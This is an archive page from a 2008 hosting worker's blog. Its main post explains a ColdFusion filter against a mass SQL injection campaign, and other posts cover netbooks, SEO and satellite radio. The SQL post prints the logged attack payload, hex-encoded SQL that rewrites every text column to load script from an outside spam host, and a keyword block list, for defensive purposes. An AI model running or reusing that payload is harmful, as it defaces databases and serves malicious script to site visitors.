Archive for the ‘Technology’ Category

Coldfusion trick for stopping SQL Injection

December 4th, 2008

A while back, there was an internet worm, or an extremely prodigious hacker, hacking sites through SQL injection to place links to a Chinese spam site. It was really frustrating, because it targeted ColdFusion sites and we host a lot of those.

Here’s an example of how these attacks looked in the logfiles:

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Well, we ended up with two lines to place into our Application.cfm files to stop it. Basically, it looks at the script name, path info and query string of the request and aborts if it finds an EXEC( or CAST( in them. Simple and effective:

<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>

I paste that line in a few times and change “EXEC(” to “CAST(” and “DECLARE(”, and to anything else that happens to be something I’m not going to use and might be dangerous.
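The same check, written once as a loop over a list of tokens instead of pasting the line several times. This is an added example, not the blog's own code; the token list, the log file name and the 403 status are my choices. Two details worth checking against the logged attack above: the request arrives URL-encoded (spaces as %20), so the text is decoded before matching, and in that payload DECLARE is followed by an encoded space and the variable name rather than a parenthesis, so a token of DECLARE( would not match it.

```cfml
<!--- Application.cfm fragment: added example, not the blog's own code. --->
<!--- Tokens to refuse anywhere in the request path or query string (my choice of list). --->
<cfset blockedTokens = "EXEC(,CAST(,DECLARE @">

<!--- The logged attack arrives URL-encoded (%20 for spaces), so decode before matching. --->
<cfset requestText = URLDecode(cgi.SCRIPT_NAME & " " & cgi.PATH_INFO & " " & cgi.QUERY_STRING)>

<cfloop list="#blockedTokens#" index="token">
    <!--- FindNoCase returns 0 when the token is absent; like "contains" it is case-insensitive. --->
    <cfif FindNoCase(token, requestText) GT 0>
        <!--- Record the block so the hosting team can see what is being filtered (file name is my choice). --->
        <cflog file="sqli-blocks" type="warning"
               text="Blocked #cgi.REMOTE_ADDR# #cgi.SCRIPT_NAME#?#cgi.QUERY_STRING#">
        <cfheader statuscode="403" statustext="Forbidden">
        <cfabort>
    </cfif>
</cfloop>
```

The cflog line is there so that blocked requests show up in a dedicated log rather than silently disappearing; a sudden rise in that file is the earliest sign that a new variant of the attack is hitting the hosted sites.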

The real solution, of course, is to write good code. Use cfqueryparam with maxlength set. Best practices are something I can use when I code, but as we host code that our users write or download, it’s impossible for me to make sure all of their code is secure. I can, however, write a few lines into the top of their Application.cfm files to protect our SQL servers.
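What the cfqueryparam approach looks like in a catalog lookup, as an added example rather than code from the blog (the "shop" datasource and the "products" table and its columns are invented). The values are bound as typed parameters instead of being concatenated into the SQL string, so a query string carrying EXEC(...) reaches the database as data, not as statements; cf_sql_integer rejects a non-numeric id, and maxlength rejects over-long input before the query runs.

```cfml
<!--- Added example, not the blog's code; "shop" datasource and "products" table are invented. --->
<cfparam name="url.id" default="0">
<cfparam name="url.color" default="">

<cfquery name="getProduct" datasource="shop">
    SELECT id, name, price
    FROM products
    <!--- Each user-supplied value is sent as a typed bind parameter, never spliced into the SQL text. --->
    WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
      AND color = <cfqueryparam value="#url.color#" cfsqltype="cf_sql_varchar" maxlength="20">
</cfquery>
```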

Programming, Technology

Black Friday - Cheap Netbooks Anyone?

November 24th, 2008

If you’re looking for a nice cheap netbook this holiday season, check out the Acer Aspire One that’s in Staples’ Black Friday advert.

The Aspire One is an ultraportable that’s just a little bit bigger than my Asus EeePC (with a 7″ display). It’s got a strong processor for a netbook, good memory, and a REAL HARD DISK. A bonus for those who were thinking the EeePC’s built-in SSD drives were just a bit too small.

They also come in the customizable colors that made the EeePC so popular. (Yes ladies, you can get yours in pink!)

Gadgetry, Technology

Resources for the Up-And-Coming Webmaster

November 20th, 2008

Being a new and overwhelmed blog-writer, I’ve been struggling with what seemed like a long delay in getting my spiffy new blog indexed by everyone’s favorite search engine, Google. I read some of Google’s pages for webmasters, and the general consensus there seemed to be that waiting was in order. There wasn’t a lot of detailed information about how long, whether I was looking at hours, weeks, or even months of waiting for that first Google spider to come to my blog.

Then a web search brought me to the answer, and I’d like to share it: it might never happen unless I do more than I was expecting to. I added my URL and waited, and waited. Apparently, though, this only starts one part of a process which, without links from other websites (and not just any old link will do), may never complete.

I found the answer here, at Smart IT Consulting: Google Sitemaps - The How-To What-Is FAQ

I’d recommend a thorough reading of their FAQs for anyone that’s in my position, wanting to get a site listed on Google, or to increase the rankings of a site already there. I sure can’t wait until I’m at that point. Hopefully now that I’m back on the right track, and I know what I can do to make this work, I’ll be there soon.

Blogging, Technology

The Duplicate Content Penalty

November 19th, 2008

Working at a web hosting company, I frequently get asked questions about search engine optimization. I’m definitely no expert in that arena; in fact I’ve offered only the simplest of advice and never gone into detail for a customer that was looking for SEO. What I usually say is to make sure the content is original and doesn’t look like spam, then use a handful of relevant keywords and a title that describes the page instead of advertising for it.

That has worked surprisingly well for me and for a few of the customers I advised to try it, but it’s vague. It doesn’t satisfy the people that really need to get into the nuts and bolts of how what they write affects where they appear on the search results pages. I need to get myself more information so that I can be more informative when people ask. Perhaps a bit more informative, but I still feel I’m dabbling in an art that’s more magic than science.

One of the things I’ve been asked, specifically, is about the so-called ‘duplicate content penalty’ from Google. As in, multiple pages on your domain that display the same results being penalized. I went in search of an answer for this, and found one quickly. It does not happen.

According to Susan Moskwa of Google in a blog entry:

Let’s put this to bed once and for all, folks: There’s no such thing as a “duplicate content penalty.” At least, not in the way most people mean when they say that.

So, all of those CGI applications, e-commerce programs, and on and on, ARE OK. When they see different URLs, for example HTTP GET strings with long series of parameters that can appear in different orders, they combine the results of the duplicate pages and assign the search engine’s ‘value’ to the combined page, represented by one of the URLs. So /store/catalog.asp?cat=turban&color=black and /store/catalog.asp?color=black&cat=turban return the same results, get grouped together, and are represented by one of the URLs, which gets chosen nondeterministically by the crawler.

It’s not penalized! But then again, you can’t choose the URL that represents your content that way either. Not so good. What do you do if you want or need to do that? The answer is to use a Sitemap (note the capital ‘S’).

So, if that’s not the duplicate content that does get penalized, what is?

Spam sites, and theft, basically. Sites that scrape content from another site without adding meaningful original content, or sites that don’t differ from one another in any significant way. My next door neighbor in one of the houses I used to live in loved to do Multi Level Marketing schemes on the web, and frequently got new ‘cookie-cutter’ web sites from the companies he signed up with, and tried to advertise them (spamvertise, actually, but that’s another story). This is why that never worked. It was just like the other 99 sites above and below him, and the web just doesn’t need another copy of that page.

So for all intents and purposes, unless you’re scraping and republishing content that’s not original, you shouldn’t have to worry about the duplicate content penalty.

Blogging, Technology

XM and Sirius Win, Customers Lose

November 15th, 2008

This week the two previously competing satellite radio companies Sirius and XM, whose companies merged four months ago, also merged their channels together into Sirius XM — a move that feels more like a Sirius takeover than a merger. Complaints are ringing out across the net from XM customers about the few stations remaining before the merger being replaced with stations from Sirius.

For the past months, I have seen XM’s lineup dropping stations. There had been a series of 10 stations that played hip-hop, for example, from 60-70 on the ‘dial’. That was when I signed up about two years ago. Then one day a few stations just disappeared. The buttons skipped their numbers, their names were gone from the XM listings. As if they’d never existed. So then there were only 8, and your forward and back skipped a few numbers on the way from 60 to 70. And then 4 or 5. Then two. Two stations between 60 and 70! Well, they kept the best ones, I guessed, and I enjoyed the two that seemed to stay around. I started to wonder if I should keep my subscription when it came up for renewal. This wasn’t only happening to hip-hop, it was in all the genres of music. Electronic, Rock, Alternative. The selections dwindled to almost non-existent.

Then the merger came, and it happened across the board. Many more stations went off air, and many more, with little warning, were replaced with the stations from Sirius. The three remaining Rock stations that I was listening to, Fred, Lucy, and Ethel, have been replaced with Sirius counterparts which, pardon me saying, are not nearly what I’m used to. Their selections just don’t compare. The Sirius DJs are constantly breaking in and talking, doing station IDs, answering calls. XM as I remember it was music, uninterrupted, commercial free, good music.

It isn’t anymore.

Technology